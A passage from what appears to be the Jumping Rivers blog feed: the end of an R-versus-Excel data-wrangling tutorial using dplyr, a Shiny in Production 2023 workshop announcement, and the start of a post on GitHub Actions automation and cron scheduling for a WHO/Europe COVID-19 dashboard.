&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 England 2011 100 3 1500&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 America 2011 100 3 1500&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 America 2012 150 2 2000&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 South Ko… 2012 11 5 1333&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # ℹ 22 more rows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Again, with Excel representing a point-and-click nature, it is
impossible to identify. by looking at a column, how the data was
modified. If I were to replicate these steps in two years time I would
likely have forgotten where to point and click. With R however, we have
our code which clearly shows each step used to manipulate the data. If I
were to return to my script in two years time, I would easily be able to
replicate the analysis.&lt;/p&gt;
&lt;h4 id="3-selecting-and-adding-a-new-column"&gt;3. Selecting and adding a new column&lt;/h4&gt;
&lt;p&gt;Let’s reduce our data set by first selecting the &lt;code&gt;country&lt;/code&gt;, &lt;code&gt;year&lt;/code&gt;,
&lt;code&gt;number_movies&lt;/code&gt; and &lt;code&gt;highest_profit&lt;/code&gt; columns. Then we will generate a
new column called &lt;code&gt;complete_profit&lt;/code&gt;. The &lt;code&gt;complete_profit&lt;/code&gt; column should
be generated from taking the &lt;code&gt;highest_profit&lt;/code&gt; column divided by the
&lt;code&gt;no_movies&lt;/code&gt; column.&lt;/p&gt;
&lt;h4 id="excel-5"&gt;Excel&lt;/h4&gt;
&lt;p&gt;&lt;img alt="Manually creating a new column using Excel." height="auto" id="h-rh-i-1" src="https://www.jumpingrivers.com/blog/comparing-r-excel-data-wrangling/graphics/new_column.gif" width="600"&gt;&lt;/p&gt;
&lt;h4 id="r-5"&gt;R&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;movies_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(country, year, number_movies, highest_profit) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(complete_profit &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; highest_profit&lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt;number_movies)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 26 × 5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## country year number_movies highest_profit&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 England 2011 3 100&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 America 2012 2 150&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 America 2013 4 300&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 England 2013 2 130&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # ℹ 22 more rows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # ℹ 1 more variable: complete_profit &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="4-removing-a-column"&gt;4. Removing a column&lt;/h4&gt;
&lt;h4 id="excel-6"&gt;Excel&lt;/h4&gt;
&lt;p&gt;In Excel, inserting or deleting a column is a manual process. First, we
select the column then right-click at the top of a column and then
select the Delete option.&lt;/p&gt;
&lt;h4 id="r-6"&gt;R&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(movies_data, &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;year)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 26 × 4&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## country highest_profit number_movies no_employees&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 England 100 3 1500&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 America 150 2 2000&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 America 300 4 4000&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 England 130 2 4020&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # ℹ 22 more rows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In R, we simply used the &lt;code&gt;select&lt;/code&gt; function from the {dplyr} package to
select a column of our data frame. To remove a column we put a &lt;code&gt;-&lt;/code&gt; in
front of the variable to exclude it from our data.&lt;/p&gt;
&lt;h4 id="5-select-only-the-entries-for-a-particular-year"&gt;5. Select only the entries for a particular year&lt;/h4&gt;
&lt;h4 id="excel-7"&gt;Excel&lt;/h4&gt;
&lt;p&gt;Here we are interested in extracting the data collected only during the
year 2021. Using Excel software, we first sort the year column and then
manually select the years that we are interested in. While applying this
manual technique of selecting pieces of data that we are interested in,
it is very easy to select the wrong data or even accidentally delete
data.&lt;/p&gt;
&lt;p&gt;&lt;img alt="A gif to manually retain all the data collected during the year\n2021." height="auto" id="h-rh-i-2" src="https://www.jumpingrivers.com/blog/comparing-r-excel-data-wrangling/graphics/subsetting.gif" width="600"&gt;&lt;/p&gt;
&lt;h4 id="r-7"&gt;R&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(movies_data, year &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2021&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 4 × 5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## country year highest_profit number_movies no_employees&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 America 2021 800 3 6800&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 England 2021 120 1 1325&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 America 2021 800 3 6800&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 China 2021 230 2 3101&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="6-remove-only-the-row-entries-from-2-4"&gt;6. Remove only the row entries from 2-4&lt;/h4&gt;
&lt;h4 id="excel-8"&gt;Excel&lt;/h4&gt;
&lt;p&gt;Removing rows in Excel is once again a manual process. We select the
rows that we do not want to keep, then right click and delete those
rows. These rows are now permanently deleted from the data sheet. If we
were interested in adding them back into the sheet, we would have to
find it (if we had a back up Excel sheet) and copy and paste it back
into our data analysis Excel sheet. If we did not have a back up of the
data that we had deleted, then this data would be completely lost.&lt;/p&gt;
&lt;h4 id="r-8"&gt;R&lt;/h4&gt;
&lt;p&gt;In R we can use the &lt;code&gt;slice()&lt;/code&gt; function to return a subset of rows based
on their position. If you want to remove rows using &lt;code&gt;slice()&lt;/code&gt; instead of
retaining them you can just add a &lt;code&gt;-&lt;/code&gt; in front of the row indices you’re
passing into the function. So, to remove rows 2, 3, and 4:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;slice&lt;/span&gt;(movies_data, &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 23 × 5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## country year highest_profit number_movies no_employees&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 England 2011 100 3 1500&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 South Ko… 2013 177 3 5300&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 America 2014 350 1 3150&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 South Ko… 2015 700 6 6000&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # ℹ 19 more rows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="using-r-and-excel"&gt;Using R and Excel&lt;/h3&gt;
&lt;p&gt;There are multiple ways in which data manipulation is used efficiently
in data science. Data formatting is important and must be organised to
be read by the various software programs, be it in R or Excel.&lt;/p&gt;
&lt;p&gt;Excel is an excellent tool and is easy to use and at times it is the
most appropriate tool. Excel is often used for data processing work
under general and basic office requirements. However, Excel is limiting
in that the data file itself can hold only approximately 1 million rows
without the aid of other tools. The basic built in statistical analysis
is too simple and has very little practical value. If you are an
aspiring data analyst, you will need to expand your toolset and start
thinking beyond the rows and columns of a spreadsheet. R functions cover
almost any area where data is needed. Getting started with R is very
simple especially because of the easy-to-use and understandable syntax.
Most importantly, R facilitates reproducible analyses.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;A hammer is great for driving nails, but it’s not the only tool out
there.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If you’re interested in learning R, then attend our &lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-tidyverse-readr-ggplot2-dplyr/" rel="external"&gt;Introduction to
R&lt;/a&gt;
course.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/comparing-r-excel-data-wrangling/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Shiny in Production 2023: Workshops</title><link>https://www.jumpingrivers.com/blog/sip23-workshops/</link><pubDate>Tue, 21 Feb 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/sip23-workshops/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/sip23-workshops/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/sip23-workshops/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Shiny in Production is returning to &lt;a href="https://www.thecatalystnewcastle.co.uk/" rel="external"&gt;the Catalyst&lt;/a&gt; this October! Our workshop lineup has now been finalised, and our first two speakers are confirmed. If you want to read more about the speakers, or register for the conference, &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;head over to the website&lt;/a&gt;. Early bird tickets are now on sale!&lt;/p&gt;
&lt;p&gt;For the workshops this year, we see the return of the extremely popular Introduction to Posit (formerly RStudio) Connect, as well as a two new shiny-centered topics.&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-sip23-workshops"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;!-- This is where the ad goes! Just use the name of the shortcode file. --&gt;&lt;/p&gt;
&lt;h3 id="shiny-and-python"&gt;Shiny and Python&lt;/h3&gt;
&lt;p&gt;Gone are the days when Shiny was only for R programmers! In the last year, &lt;a href="https://posit.co/" rel="external"&gt;Posit&lt;/a&gt; have released &lt;a href="https://shiny.rstudio.com/py/" rel="external"&gt;Shiny for Python&lt;/a&gt;. Further information on the workshop to follow!&lt;/p&gt;
&lt;h3 id="building-responsive-shiny-apps"&gt;Building Responsive Shiny Apps&lt;/h3&gt;
&lt;p&gt;The diverse range of devices used for modern web browsing presents challenges when designing an application that works well for all users. Enter responsive design: the practice of building fluid web pages that “work” on huge 4k and 5k monitors, tiny smartphones and all things in between. This course will look at responsive design principles and best practices for Shiny developers, covering page layout, easy-to-add widgets and some simple CSS tricks for when built-in solutions don’t quite cut it.&lt;/p&gt;
&lt;h3 id="shiny-testing"&gt;Shiny Testing&lt;/h3&gt;
&lt;p&gt;This is the newest of our workshops that we&amp;rsquo;re planning for the conference, so we&amp;rsquo;ll have more information on what to expect very soon. If you&amp;rsquo;re interested in the topic in the meantime, take a look at our &lt;a href="https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-1/" rel="external"&gt;recent blog series&lt;/a&gt; on end-to-end testing with &lt;a href="https://rstudio.github.io/shinytest2/" rel="external"&gt;{shinytest2}&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/sip23-workshops/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Work smarter; not harder: COVID-19 processing for the WHO/Europe</title><link>https://www.jumpingrivers.com/blog/who-shiny-covid-maintenance-github-actions/</link><pubDate>Thu, 16 Feb 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/who-shiny-covid-maintenance-github-actions/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/who-shiny-covid-maintenance-github-actions/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/who-shiny-covid-maintenance-github-actions/original.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Last night, I filled a washing machine with laundry and scheduled it to finish in the morning.
And do you know what I had to do next? Nothing. I simply went to bed.
In stark contrast to 100 years ago, I didn’t need to fill a bucket with water,
I didn’t spend an hour rubbing clothes against a washboard to agitate away the dirt,
and I didn&amp;rsquo;t need to worry about whether the prolonged contact between
a cleaning detergent and my hands was damaging to the skin.
Instead, a machine followed its pre-programmed routine, and I slept like a log.
And what could possibly be better than an extra hour in bed?&lt;/p&gt;
&lt;p&gt;That&amp;rsquo;s just one of many examples of the small automated processes that appear throughout our lives.&lt;/p&gt;
&lt;!-- other quick examples to mention here? --&gt;
&lt;p&gt;But they all have a common purpose: to make our lives easier.&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;re a regular on our blog, you may have already read about
&lt;a href="https://www.jumpingrivers.com/blog/who-shiny-covid-maintenance-continuous-integration/"&gt;how we streamlined the data processing&lt;/a&gt;
on an application we&amp;rsquo;re maintaining for the World Health Organisation Europe (WHO/Europe).
Those steps improved the experience for users of their
&lt;a href="https://worldhealthorg.shinyapps.io/EURO_COVID-19_vaccine_monitor/" target="_blank"&gt;WHO/Europe COVID-19 Vaccine Programme Monitor&lt;/a&gt;,
by slashing loading times and improving responsiveness.&lt;/p&gt;
&lt;p&gt;But today, I want to tell you about how automation improved the experience for those
working behind the scenes of the application.
Tasks were completed automatically, taking away opportunities for human error to sneak in to our processes.
Work was autonomously performed each day, providing early warnings about issues with the latest data.
Software was frequently tested on a clean environment, verifying that our work could be reproduced on other systems.&lt;/p&gt;
&lt;p&gt;Ultimately, developers and maintainers from both Jumping Rivers and the WHO/Europe
spent less time on the trivial and repetitive tasks,
and more time making improvements where it really mattered.
And by sprinkling a little automation in your work, you might just enhance your productivity too.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-who-shiny-maintenance-github-actions"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="where-can-we-delegate-the-tasks-to"&gt;Where can we delegate the tasks to?&lt;/h2&gt;
&lt;p&gt;The aim of these automated workflows is to take some of the menial tasks that are frequently
performed, and complete them automatically using a &lt;a href="https://en.wikipedia.org/wiki/CI/CD" target="_blank"&gt;continuous integration and continuous delivery&lt;/a&gt; (CI/CD) pipeline.
Many options for performing CI/CD pipelines exist already&amp;mdash;such as
&lt;a href="https://www.jenkins.io/" target="_blank"&gt;Jenkins&lt;/a&gt;,
&lt;a href="https://docs.gitlab.com/ee/ci/" target="_blank"&gt;GitLab CI/CD&lt;/a&gt;,
&lt;a href="https://bitbucket.org/product/features/pipelines" target="_blank"&gt;Bitbucket pipelines&lt;/a&gt;,
&lt;a href="https://circleci.com/" target="_blank"&gt;CircleCI&lt;/a&gt; to name just a few&amp;mdash;
but in the case of the WHO/Europe COVID-19 Vaccine Programme Monitor,
we utilized &lt;a href="https://github.com/features/actions" target="_blank"&gt;GitHub Actions&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;In a typical CI/CD pipeline, we are allocated a blank machine, onto which we can install all
the software dependencies we need and to run the tasks, before cleaning itself back out of existence.
Now it may sound wasteful to be installing everything from scratch every time a pipeline runs,
but there are serious benefits here: starting from scratch is the ultimate check of whether our
code is portable and can be run by anyone from any machine.
And with &lt;a href="https://www.jumpingrivers.com/blog/r-packages-travis-github-actions-rstudio/"&gt;a few tricks here&lt;/a&gt; and a bit
of caching there, set up times for CI/CD pipelines can actually be very reasonable.&lt;/p&gt;
&lt;h2 id="the-basic-concept-of-an-automated-workflow"&gt;The basic concept of an automated workflow&lt;/h2&gt;
&lt;p&gt;For GitHub Actions, we specify a few things in a YAML file,&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;When the workflow should run.&lt;/li&gt;
&lt;li&gt;What operating system our virtual machine should use.&lt;/li&gt;
&lt;li&gt;What environment variables should be defined.&lt;/li&gt;
&lt;li&gt;What tasks should be performed.&lt;/li&gt;
&lt;/ol&gt;
&lt;h2 id="what-do-we-automate"&gt;What do we automate?&lt;/h2&gt;
&lt;h3 id="tests"&gt;Tests&lt;/h3&gt;
&lt;p&gt;There are a number of processes that we automate, but we&amp;rsquo;ll start with the one that most
developers will want to automate: Testing.
It&amp;rsquo;s a good idea to have tests run when changes are made to the code.
After all, if the new code has a mistake, it&amp;rsquo;s good for your tests to find the error before you
go on to build even more code on top of it.
So everytime changes are pushed to a pull request or the main branch of our git repository,
a workflow runs to perform all tests.&lt;/p&gt;
&lt;!-- Tests can be created and run using the {testthat} package --&gt;
&lt;h3 id="deployments"&gt;Deployments&lt;/h3&gt;
&lt;p&gt;The WHO/Europe COVID-19 Vaccine Programme Monitor is hosted on &lt;a href="https://www.shinyapps.io/" target="_blank"&gt;shinyapps.io&lt;/a&gt;.
Originally, when changes were made to the application, someone would have to manually perform the
process of publishing the latest version of the application online.
Not only is this needlessly inefficient to have a developer wasting time performing this
operation, but it also allows for human-error to enter the situation&amp;mdash;what if you&amp;rsquo;re logged into
the wrong account, or you overwrite the wrong application, or perhaps you just patched a critical
bug in your code repository but forget to publish the fixed app altogether? In this scenario, it&amp;rsquo;s better to have a
pipeline watching over us, ready to step in at the right moment.&lt;/p&gt;
&lt;p&gt;A nice feature of &lt;a href="https://www.shinyapps.io/" target="_blank"&gt;shinyapps.io&lt;/a&gt; is that multiple apps can be hosted from a single account.
We took advantage of this by creating automated workflows that deploy the latest versions of the
apps to shinyapps.io everytime changes were pushed to the default branch, giving users the
newest version of the app at all times.&lt;/p&gt;
&lt;p&gt;But to make life easier for ourselves, we also publish versions of the app for every proposed change
that we create.
Not only does this ensure the app should deploy correctly, but it provides a working version of the
application that members of the WHO can view, allowing them to request changes or provide approval
before all changes are confirmed.
When those changes are incorporated into the main versions of the app, our automated workflows
delete these development apps and publish the public version.&lt;/p&gt;
&lt;h3 id="data-processing"&gt;Data processing&lt;/h3&gt;
&lt;p&gt;Our previous blog post &lt;a href="https://www.jumpingrivers.com/blog/who-shiny-covid-maintenance-continuous-integration/"&gt;on the data processing&lt;/a&gt;
mentioned how a GitHub Actions workflow now handles data processing
outside of the app on a daily schedule.
We don&amp;rsquo;t actually need to push code to GitHub to prompt that a workflow should run;
a workflow can be scheduled to start at particular times or at regular intervals.
It&amp;rsquo;s defined in a GitHub Actions workflow using a cron schedule expression&amp;mdash;
a sequence of 5 values that denote the minutes, hours, day of month, month, and day of week when a
job should occur, specified according to UTC.&lt;/p&gt;
&lt;p&gt;Let&amp;rsquo;s suppose we want to run a job at 09:30 BST (that&amp;rsquo;s UTC+01), on every weekday (Monday to Friday).
We would specify this as:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-cron" data-lang="cron"&gt;30 8 * * 1-5
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Let&amp;rsquo;s break that down:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;30 8&lt;/code&gt; at the start represents the minutes and hours, so the sheduled time is 08:30 UTC. If you&amp;rsquo;re
working in a BST timezone, that&amp;rsquo;ll translate to 09:30.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;* *&lt;/code&gt; means every day of the month and every month of the year, respectively.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;1-5&lt;/code&gt; represents the day of the week, where 1 is Monday and 7 is Sunday. So this represents every
day from Monday to Friday.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The &lt;a href="https://crontab.guru/" target="_blank"&gt;Crontab.guru&lt;/a&gt; website is useful for testing the meaning of a cron expression,
or for checking you have constructed your own cron expression correctly.&lt;/p&gt;
&lt;p&gt;GitHub Actions allows for multiple cron times to be specified, and it will run when &lt;em&gt;any&lt;/em&gt; of the
listed times are reached.
And that&amp;rsquo;s a good thing, because the keen-eyed among you will have noticed the issue with the cron specification above: Daylight savings time.&lt;/p&gt;
&lt;p&gt;Suppose we actually want to run it every weekday at 09:30 Europe/London time, which is a mixture of BST (UTC+01) between the last Sundays in March and October, and GMT (UTC+00). We can specify several cron expressions to cover different times across the year.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-cron" data-lang="cron"&gt;30 9 * 11-12,1-3 1-5&amp;#39; # 09:30 hours GMT from 1 Nov to 31 Mar.
30 8 25-31 3 1-5&amp;#34; # 09:30 hours BST from 25 Mar - 1 Apr.
30 8 * 4-10 1-5&amp;#39; # 09:30 hours BST from 1 Apr - 31 Oct.
30 9 25-31 10 1-5&amp;#34; # 09:30 hours GMT from 25 Oct - 1 Nov.
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;This strategy still isn&amp;rsquo;t perfect&amp;mdash;for the last weeks in March and October, we essentially run the automated workflow twice, separated by an hour, because we can&amp;rsquo;t be sure which day daylight savings time changes.&lt;/p&gt;
&lt;p&gt;To further complicate matters, despite our best efforts to ensure the job runs at 09:30 local time, when you&amp;rsquo;re using the shared resources of Github Actions, your job may have to wait in a queue for several minutes&amp;mdash;or even hours&amp;mdash;if it&amp;rsquo;s a particularly busy time for their servers. Got a mission-critical workflow that &lt;em&gt;must&lt;/em&gt; run exactly on time? Then have the job performed by your own dedicated CI/CD runners. &lt;!-- Is this a service that Jumping Rivers can set=up and manage, which can be advertised here? --&gt;&lt;/p&gt;
&lt;h2 id="how-do-i-set-up-a-workflow"&gt;How do I set up a workflow?&lt;/h2&gt;
&lt;p&gt;The method used will depend on what CI/CD runner you&amp;rsquo;ll be using. We&amp;rsquo;ll discuss a very basic workflow for an R user who has a shiny app they want to automatically deploy to shinyapps.io using Github Actions.&lt;/p&gt;
&lt;p&gt;We&amp;rsquo;re going to start by creating a new Shiny app in RStudio, which will come initialised with a git repository and will use {renv}. The renv lockfile will already come supplied with the necessary packages needed to run the default &amp;ldquo;Old Faithful Geyser&amp;rdquo; app.
We&amp;rsquo;ll also make sure we&amp;rsquo;ve deployed our app to GitHub.&lt;/p&gt;
